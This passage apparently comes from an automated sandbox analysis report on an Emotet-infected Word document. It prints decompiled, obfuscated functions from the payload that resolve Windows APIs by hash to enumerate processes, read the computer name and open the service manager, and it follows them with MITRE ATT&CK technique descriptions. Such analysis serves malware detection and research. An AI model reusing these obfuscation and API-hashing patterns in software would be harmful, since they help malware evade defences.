0x002e9eff
0x002e9f00
0x002e9f05
0x002e9f0f
0x002e9f1b
0x002e9f1e
0x002e9f21
0x002e9f28
0x002e9f2f
0x002e9f36
0x002e9f4d
0x002e9f50
0x002e9f57
0x002e9f5e
0x002e9f65
0x002e9f6c
0x002e9f73
0x002e9f7a
0x002e9f8d
0x002e9f9a
0x002e9fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,002E5A72,0000B2BF), ref: 002E9F9A

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 28773dd8cf81eabc8026ab2ac8b9dc53c8c3088d429081e4d120396cfa267bef
Instruction ID: 35ab25fa850b887e34e4799af1c2461092f926cc892cf94ccca1addb9b2cfac9
Opcode Fuzzy Hash: 28773dd8cf81eabc8026ab2ac8b9dc53c8c3088d429081e4d120396cfa267bef
Instruction Fuzzy Hash: A311F375D0122DEBDB04DFE9C84A9EEBFB4EF05344F10814AE815A6250D3745B608FA1

Uniqueness

Uniqueness Score: -1.00%

Function 002D3A1B, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002D3A1B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				intOrPtr* _t49;
				void* _t50;

				E002DE171(_t41);
				_v12 = 0xb6ca;
				_v12 = _v12 << 0xb;
				_v12 = _v12 * 0x29;
				_v12 = _v12 + 0x8b1c;
				_v12 = _v12 ^ 0xea336cc2;
				_v16 = 0xc7a4;
				_v16 = _v16 << 5;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 ^ 0x047bf20c;
				_v20 = 0xabba;
				_v20 = _v20 ^ 0x7dad82f1;
				_v20 = _v20 ^ 0x7dad3ac7;
				_v8 = 0x3ef9;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 + 0xffffb6dd;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0xffff75b6;
				_t49 = E002D606F(0x266, 0xb6b01ae5, __ecx, __ecx, 0xb5cfa41d);
				_t50 =  *_t49(_a8, _a16, __ecx, __edx, _a4, _a8, _a12, _a16); // executed
				return _t50;
			}

0x002d3a2f
0x002d3a34
0x002d3a3e
0x002d3a52
0x002d3a55
0x002d3a5c
0x002d3a63
0x002d3a6a
0x002d3a77
0x002d3a7a
0x002d3a81
0x002d3a88
0x002d3a8f
0x002d3a96
0x002d3a9d
0x002d3aa1
0x002d3aa8
0x002d3aab
0x002d3abe
0x002d3acc
0x002d3ad1

APIs

ProcessIdToSessionId.KERNEL32(047BF20C,?,?,?,?,?,?,?,?,?,?,?), ref: 002D3ACC

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 74c498ea89aab2e14e6ff077a5cf43d5ca52ef2a469895fd4e3dc9d029805a76
Instruction ID: d5244efd165fa3430ce08e3ab0a3eaacc56f59ca574e20af11955e702f80480d
Opcode Fuzzy Hash: 74c498ea89aab2e14e6ff077a5cf43d5ca52ef2a469895fd4e3dc9d029805a76
Instruction Fuzzy Hash: 5811E2B5D0020DEBCF05DFE4C94A89EBFB1FB04304F608598E825A6261D3B99B14DF51

Uniqueness

Uniqueness Score: -1.00%

Function 002E4C42, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E002E4C42(void* __ecx, DWORD* __edx, intOrPtr _a4, CHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t35;
				int _t42;
				DWORD* _t46;

				_push(_a8);
				_t46 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002DE171(_t35);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xa9cc8;
				_v20 = 0x3c45;
				_v20 = _v20 ^ 0xf5fc07c2;
				_v20 = _v20 ^ 0xf5fc0712;
				_v16 = 0x8b6d;
				_v16 = _v16 | 0xd22cb672;
				_v16 = _v16 ^ 0xd22ccbf1;
				_v8 = 0x4ab1;
				_v8 = _v8 + 0x84a0;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x019e84cb;
				_v12 = 0x9260;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000071df;
				E002D606F(0x220, 0xb6b01ae5, __ecx, __ecx, 0x95831954);
				_t42 = GetComputerNameA(_a8, _t46); // executed
				return _t42;
			}

0x002e4c49
0x002e4c4c
0x002e4c4e
0x002e4c51
0x002e4c52
0x002e4c53
0x002e4c58
0x002e4c5f
0x002e4c68
0x002e4c6f
0x002e4c76
0x002e4c7d
0x002e4c84
0x002e4c8b
0x002e4c92
0x002e4c99
0x002e4ca0
0x002e4ca7
0x002e4cab
0x002e4cb2
0x002e4cb9
0x002e4cbd
0x002e4cdc
0x002e4ce8
0x002e4cee

APIs

GetComputerNameA.KERNEL32(D22CCBF1,?,?,?,?,?,?,?,?), ref: 002E4CE8

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9fa11076082d32a32f8e07a0075711743bce164504742797810c9d3cef717936
Instruction ID: 4392679319903463433cac42116b3e5a220b13c97b8d825783d84b0b797d73be
Opcode Fuzzy Hash: 9fa11076082d32a32f8e07a0075711743bce164504742797810c9d3cef717936
Instruction Fuzzy Hash: 1A1125B5D0021CFBEB08EFD4D80A99EBFB8FF00318F108188E82966241D3B84B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 002E349F, Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E002E349F(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t34;
				void* _t40;
				struct tagPROCESSENTRY32W* _t44;

				_push(_a8);
				_t44 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002DE171(_t34);
				_v8 = 0xe3a2;
				_v8 = _v8 << 7;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x000072b6;
				_v20 = 0xa8be;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x2a2fb79e;
				_v12 = 0x54b5;
				_v12 = _v12 | 0x192aadbb;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x55fb03de;
				_v16 = 0x7533;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x0000161f;
				_t40 = E002D606F(0x2fd, 0xb6b01ae5, __ecx, __ecx, 0x7d2377e4);
				Process32FirstW(_a8, _t44); // executed
				return _t40;
			}

0x002e34a6
0x002e34a9
0x002e34ab
0x002e34ae
0x002e34af
0x002e34b0
0x002e34b5
0x002e34bf
0x002e34c8
0x002e34cc
0x002e34cf
0x002e34d6
0x002e34dd
0x002e34e1
0x002e34e8
0x002e34ef
0x002e34f6
0x002e34fa
0x002e3501
0x002e3508
0x002e350c
0x002e352b
0x002e3537
0x002e353d

APIs

Process32FirstW.KERNEL32(0000161F,?,?,?,?,?,?,?,?,?), ref: 002E3537

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 0ba4b686800a35a258633f64bfa9eac8ca52a90c1cc1f36c47acb31e2faf24b8
Instruction ID: d9b20b37917865a9ee43692d867f8c2efc53bb9528ffa10298369385f67de563
Opcode Fuzzy Hash: 0ba4b686800a35a258633f64bfa9eac8ca52a90c1cc1f36c47acb31e2faf24b8
Instruction Fuzzy Hash: 9F111575D0121CFBEB05EFD4C84A8DEBBB4EB04718F108598E82567250D7B96B14CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E4A7E, Relevance: 1.3, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E002E4A7E(void* __ecx, intOrPtr _a4, void* _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t42;
				int _t52;
				signed int _t54;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E002DE171(_t42);
				_v20 = 0x2795;
				_v20 = _v20 | 0x18d7a725;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0000365e;
				_v16 = 0x9060;
				_t54 = 0x63;
				_v16 = _v16 * 0x65;
				_v16 = _v16 / _t54;
				_v16 = _v16 ^ 0x0000bf10;
				_v12 = 0x4b3c;
				_v12 = _v12 ^ 0xede7f6b3;
				_v12 = _v12 | 0xa238c96d;
				_v12 = _v12 ^ 0xefffdbcf;
				_v8 = 0x6ed;
				_v8 = _v8 + 0x38ce;
				_v8 = _v8 | 0x6623d235;
				_v8 = _v8 ^ 0x6623ac01;
				E002D606F(0x27e, 0xb6b01ae5, _t54, _t54, 0x35b9d729);
				_t52 = HeapFree(_a8, 0, _a12); // executed
				return _t52;
			}

0x002e4a84
0x002e4a87
0x002e4a8a
0x002e4a8d
0x002e4a90
0x002e4a95
0x002e4a9e
0x002e4aa5
0x002e4aa9
0x002e4ab0
0x002e4abd
0x002e4ac1
0x002e4ace
0x002e4ad6
0x002e4add
0x002e4ae4
0x002e4aeb
0x002e4af2
0x002e4af9
0x002e4b00
0x002e4b07
0x002e4b0e
0x002e4b28
0x002e4b38
0x002e4b3d

APIs

HeapFree.KERNEL32(0000BF10,00000000,0000365E,?,?,?,?,?,?,?,?,000065D1), ref: 002E4B38

Memory Dump Source

Source File: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000011.00000002.2342759853.00000000002D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2342788324.00000000002EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0c47f96fa3f465932cffbddcc84fc144d66b605716cdbd8d084bdc112858ee42
Instruction ID: 1054c5fad2dc949ed0df6607a29135531b9f60039abe8036b1e5b25c4055f383
Opcode Fuzzy Hash: 0c47f96fa3f465932cffbddcc84fc144d66b605716cdbd8d084bdc112858ee42
Instruction Fuzzy Hash: 0211DA75D0021CFFDF45DFE5C846A9EBBB5FB04304F108598E925A6291D7B99B109F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Doc.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Doc.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm1, Stream Size: -1

General

VBA Code Keywords

VBA Code

VBA File Name: UserForm2, Stream Size: -1

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre